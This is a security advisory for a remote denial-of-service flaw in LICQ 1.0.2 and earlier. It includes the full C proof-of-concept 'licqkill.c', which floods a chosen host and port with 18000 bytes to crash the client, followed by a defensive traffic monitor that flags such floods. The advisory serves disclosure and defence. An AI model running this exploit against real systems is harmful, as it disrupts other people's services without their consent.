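LICQ Remote Denial of Service Attack
Release date: 2001-03-01
Update date: 2001-03-01
Affected systems:
LICQ LICQ 1.0.2
LICQ LICQ 1.0.1
LICQ LICQ .85
Description:
BUGTRAQ ID: 2406
The LICQ versions listed above are vulnerable to a denial-of-service attack. Sending 12000 to 16000 characters to the port LICQ is listening on causes LICQ to crash, and it must be restarted to restore normal operation.
<* Source: Stan Bubrouski (stan@ccs.neu.edu) *>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!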
/*
 * Name: Licqkill.c
 * Author: Stan Bubrouski <stan@ccs.neu.edu>
 * Date: December 26, 2000
 * Description: Licq will crash when 16707 or more characters are sent to the port
 *              Licq is listening on. Finding the port Licq is running on is pretty
 *              simple because by default it starts using ports around 1100 or so. This
 *              has been tested against Licq v.85 and v1.0.2
 * Purpose: Proof-of-concept tool for the Licq Denial of Service vulnerability.
 */
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>   /* close() */

int main(int argc, char **argv)
{
    char buf[18000];
    int sock, result;
    struct sockaddr_in sin;
    struct hostent *hn;

    printf("licqkill.c - Licq remote DoS by Stan Bubrouski <stan@ccs.neu.edu>\n\n");
    if (argc < 3)
    {
        fprintf(stderr, "Usage: %s <host> <port>\n", argv[0]);
        exit(-1);
    }
    hn = gethostbyname(argv[1]);
    if (!hn)
    {
        fprintf(stderr, "%s: host lookup failure\n", argv[1]);
        exit(-1);
    }
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(atoi(argv[2]));
    sin.sin_addr = *(struct in_addr *)hn->h_addr;

    /* Check the socket before using it in connect(). */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0)
    {
        fprintf(stderr, "Socket error.\n");
        exit(-1);
    }
    result = connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in));
    if (result != 0)
    {
        fprintf(stderr, "Failed to establish connection to %s\n", argv[1]);
        exit(-1);
    }

    /* Fill the whole buffer with 'A'; the original strncat() loop appended to an
       uninitialized buffer and wrote one byte past its end. */
    memset(buf, 'A', sizeof(buf));
    send(sock, buf, sizeof(buf), 0);
    close(sock);
    fprintf(stdout, "Data sent\n\n");
    return 0;
}
Recommendation:
Vendor patch:
None available at this time.
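While no vendor patch is available, a monitor in front of the LICQ listening port can watch for the traffic pattern described above. The following is an added example, not part of the original advisory or of LICQ: it accumulates per-connection byte counts and flags a connection that has delivered 12000 or more bytes dominated by a single byte value. The struct and function names, the 90% ratio and the 1460-byte segment size are assumptions, and the traffic is constructed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* 12000 is the lower bound stated in the advisory; the 90% dominant-byte
 * ratio is an assumed heuristic chosen for this example. */
#define FLOOD_MIN_BYTES 12000u
#define DOMINANT_PCT    90u

struct conn_stats {          /* one per inbound TCP connection */
    size_t total;            /* bytes received so far */
    size_t hist[256];        /* count of each byte value */
};

/* Account for one received segment. Returns true once the connection has
 * delivered at least FLOOD_MIN_BYTES and one byte value dominates it. */
bool conn_feed(struct conn_stats *c, const unsigned char *seg, size_t len)
{
    size_t i, max = 0;
    for (i = 0; i < len; i++) c->hist[seg[i]]++;
    c->total += len;
    if (c->total < FLOOD_MIN_BYTES) return false;
    for (i = 0; i < 256; i++)
        if (c->hist[i] > max) max = c->hist[i];
    return max * 100 >= c->total * DOMINANT_PCT;
}

/* Constructed traffic: nseg segments of 1460 bytes (assumed size), either
 * all 'A' or, when varied is true, cycling through byte values. */
bool demo_stream_flagged(size_t nseg, bool varied)
{
    unsigned char seg[1460];
    struct conn_stats c = {0};
    bool hit = false;
    size_t s, i;
    for (s = 0; s < nseg; s++) {
        for (i = 0; i < sizeof seg; i++)
            seg[i] = varied ? (unsigned char)((s * sizeof seg + i) % 251) : 'A';
        hit = conn_feed(&c, seg, sizeof seg) || hit;
    }
    return hit;
}

int main(void)
{
    printf("%d %d %d\n", demo_stream_flagged(13, false),
           demo_stream_flagged(8, false), demo_stream_flagged(13, true));
    return 0;
}
```

A connection flagged this way can be dropped or logged before the data reaches LICQ; the thresholds should be tuned against normal traffic on the monitored host.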